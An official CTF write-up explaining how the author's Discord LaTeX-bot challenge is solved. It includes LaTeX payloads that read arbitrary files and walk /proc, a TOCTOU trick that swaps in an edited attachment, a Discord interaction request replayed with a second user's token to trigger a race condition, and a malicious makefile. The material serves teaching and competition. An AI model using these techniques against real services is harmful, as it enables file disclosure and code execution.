Try   HackMD

TSJ CTF 2022 - Remote Code TeXecution Official Write-up

This is a step-by-step tutorial of my challenge Remote Code TeXecution: Hack a Discord bot that processes \(\LaTeX\) files.

It was originally a black-box challenge with two parts: The first part is to leak the source code, and the second part is to achieve code execution. Due to the lack of people attempting, I decided to release the source code after a few hours. The white-box version is a lot easier, and solving part 1 is no longer a dependency of solving part 2.

I released the challenge a bit too late (I was fixing issues involving asyncio and concurrent requests), and it would have had more solves (even with black-box) if I had released it earlier :/.

Part 1: Leaking the source

Intended difficulty: Medium
Guessing required: A little (black-box); None (white-box)
Solve count: 1

How to read a file

We can make the bot render an arbitrary .tex file. Reading files in LaTeX is easy; in fact, there are already a lot of CTF contests that feature LaTeX challenges like this. However, there is a catch in this one: payloads containing backslash characters (hence those with any TeX command) will not produce any output.

After some testing (or reading the code), we may observe that:

  • If our file doesn't compile, the bot sends an error message.
  • Otherwise, if our file contains a backslash, the bot tells us it's insecure.
  • Otherwise, we see the rendered output.

There is a logic error: If we send a file with backslashes that doesn't compile, its error output still gets shown. This means that we can still use commands, but instead of using \input to leak information, we should print stuff to the error output.

One way to do this is to produce a custom error message with \PackageError. Another way is to know that pdflatex prints errors to stdout in a special format, so we can do something like \typeout{! abc} to trick the bot into thinking that abc is an error. We may utilize TeX's powerful control flow to read a file like this:

\catcode0=10  % make \0 not produce a syntax error
\catcode9=11  % make \t indents work correctly

\def\n{/path/to/file}
\def\l{69}
\def\r{420}

\newread\file
\openin\file=\n

\newcounter{line}
\makeatletter
\@whilenum\value{line} < \r \do {
    \read\file to \fileline
    \stepcounter{line}
    \ifnum\value{line} > \l
        \typeout{! \fileline}
    \fi
}

The above payload makes the bot print the 69th to 419th line of the file /path/to/file. There are many other ways to do the same thing, and you can find them in other CTF write-ups.

Which file to read?

Knowing how to get the contents of a file, the rest is just to determine the bot's file name. There are also many ways to do this, mostly using procfs. For example,

  1. We can find with brute-force the bot's PID: for each number PID, check if /proc/{PID}/cmdline exists and print it to see if it's the one we want.
  2. We know that the bot must be an ancestor process of LaTeX, so we can read /proc/self/status to see its parent's PID, and read /proc/{PPID}/status to see the parent's PPID, and so on, until we reach the PID 1 process. One of them is the answer.

The second way can all be done in LaTeX:

% make '\t' a token, ignore '\r', and make '\0' a space
\catcode9=\active \catcode13=14 \catcode0=10
\makeatletter

\newcommand\stripprefix[6]{}
% reads the parent pid of the argument and stores it in \@pid
\newcommand\getppid[1]{
    \openin\file=/proc/#1/status
    \@for\tmp:={1,2,3,4,5,6}\do {
        \read\file to\fileline
    }
    \read\file to\ppidline
    \def\@pid{\expandafter\stripprefix\ppidline}
    \closein\file
}
% prints /proc/\@pid/cmdline
\newcommand\print{
    \openin\file=/proc/\@pid/cmdline
    \read\file to\cmdline
    \typeout{! \unexpanded\expandafter{\cmdline}}
    \closein\file
}

\newread\file
\getppid{self}\print
\loop
    \getppid{\@pid}\print
\ifnum\@pid > 1 \repeat

The above yields:

! /bin/sh -c pdflatex -no-shell-escape -jobname output __document.tex | awk '/^
! /,/^\?/' 
! /usr/bin/make -s -C sandbox/ff8e8c9ec1904d9fc299_468420931812065281 -f makefi
le1 stage1 
! /usr/bin/sudo -u latex /usr/bin/make -s -C sandbox/ff8e8c9ec1904d9fc299_46842
0931812065281 -f makefile1 stage1 
! python3 /workdir/4sQ6xQxtIyLHwuLLjjME.py 
! /bin/bash ./entrypoint.sh 
) (./output.aux) )
No pages of output.
Transcript written on output.log.
Output PDF not found.

Which means the bot's file is /workdir/4sQ6xQxtIyLHwuLLjjME.py.

Part 2: Arbitrary code execution

Intended difficulty: bruh
Guessing required: A little
Solve count: 0

A race condition

The second part is not actually a LaTeX challenge, since I believe you cannot execute code with -no-shell-escape. As the hint suggests, we should probably upload/create our own makefile. Let's check the different ways this might be possible.

  1. Use LaTeX's \openout to write a file. However, according to the manual:

    If the file does not have an extension then TeX will add a .tex.

    So we can only create a makefile.tex, which doesn't work.
  2. /upload a makefile. The bot checks file extensions, plus Discord replaces all special characters in filenames, so this doesn't work.
  3. Upload a makefile using the direct message feature. Same as 2, it doesn't work. Unless?

There is a TOCTOU bug in 3.: The bot checks the extension first, and then waits for the user to press the "Yes" button. We may edit the file between these events to circumvent the check. We can't edit message attachments in the Discord client, but it's a thing in the API (see this and this) which means it's actually possible to upload a file with the name makefile1 or makefile2.

Another race condition

The next step is to prevent our makefile from getting overwritten immediately. Let's analyze what the bot does after we select an option:

User selects the option "White Text" for foo.tex
Bot downloads the attachment foo.tex
Bot creates the files __document.tex and makefile2
Bot runs make -f makefile2 stage1
Bot runs make -f makefile2 stage2
Bot sends output

We may notice an exploitable race condition in this process. Consider when a user sends two commands in quick succession, and this happens:

User selects the option "White Text" for foo.tex User selects the option "White Background" for makefile2
Bot downloads the attachment foo.tex
Bot creates the files __document.tex and makefile2
Bot runs make -f makefile2 stage1
Bot downloads the attachment makefile2
Bot creates the files __document.tex and makefile1
Bot runs make -f makefile1 stage1
Bot runs make -f makefile2 stage2
Bot runs make -f makefile1 stage2
Bot sends output
Bot sends output

It runs the makefile we supplied! This requires the files to all be in the same working directory, so the commands' issuers should be the same. Unfortunately, looking at the code, we can see that the procedure is protected by a mutex lock:

lock = self.locks.get(interaction.user)
if lock == None:
    lock = self.locks[interaction.user] = asyncio.Lock()

async with lock:
    # ...
    # working dir is a hash of ctx.user.id
    await self.process_file(ctx.user.id, self.user_files[ctx.user], makefile)
    # ...

which means that our exploit won't work. Unless?

Discord, what the fuck?

Let's look more closely at the snippet above. The working directory and files depends on ctx.user, and which mutex is used depends on interaction.user. Wait, that's not necessarily the same person! ctx.user is the user who used the /render command, and interaction.user is the user who clicked an option in the select menu.

Suppose there are two users user1 and user2. When user1 uses the /render command in a direct message, the bot sends this:

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Selecting an option is equivalent to sending an API request like this:

curl -X POST https://discord.com/api/v9/interactions \
     -H 'authorization: <user1 auth token>' \
     -H 'content-type: application/json' \
     -d $payload

where payload is:

{
    "type": 3,
    "nonce": "...",
    "guild_id": "...",
    "channel_id": "...",
    "message_flags": 64,
    "message_id": "...",
    "application_id": "...",
    "session_id": "...",
    "data": {
        "component_type": 3,
        "custom_id": "...",
        "type": 3,
        "values": ["t"]
    }
}

and we get the desired output from the bot:

Discord says "Only you can see this" under all messages, but is that true? Well, let's try sending the same API request above but with user2's token instead, and change the nonce to another random number. We get 400 Bad Request {"message": "Unknown Channel", "code": 10003}. It says "Unknown Channel", so let's repeat this entire thing in some channel in the TSJ CTF server, which is visible to both users. This time we get 204 No Content???

This means that user2 has successfully sent an interaction to user1's command response without actually being able to see it. After sending the API request, user2 can in fact see the output of user1's file:

This shows that ctx.user and interaction.user in the previous section can indeed be two different people, thus enabling our race condition exploit.

To sum up, the full exploit is as follows:

  1. /upload a file containing an infinite loop:
    ​​​\loop\iftrue\repeat
    
  2. Send a direct message containing any .tex file.
  3. Edit the message in step 2 to contain an attachment makefile2 that says
    ​​​stage2:
    ​​​	/readflag
    ​​​	sleep 8
    ​​​	rm -f output.png
    
  4. /render in the TSJ CTF server and select "White Text".
  5. Press the "Yes" button in the bot's reply in step 2.
  6. Using another account's authorization token, select the "White Background" option in step 4.

Steps 4 to 6 have to be done within 10 seconds (before the infinite loop gets killed), and can be carried out either by hand or by using a script. Note that you should pause a bit between the steps because of latency.

Conclusions

  • LaTeX is weird.
  • Python's asyncio is weird.
  • Discord API is weird.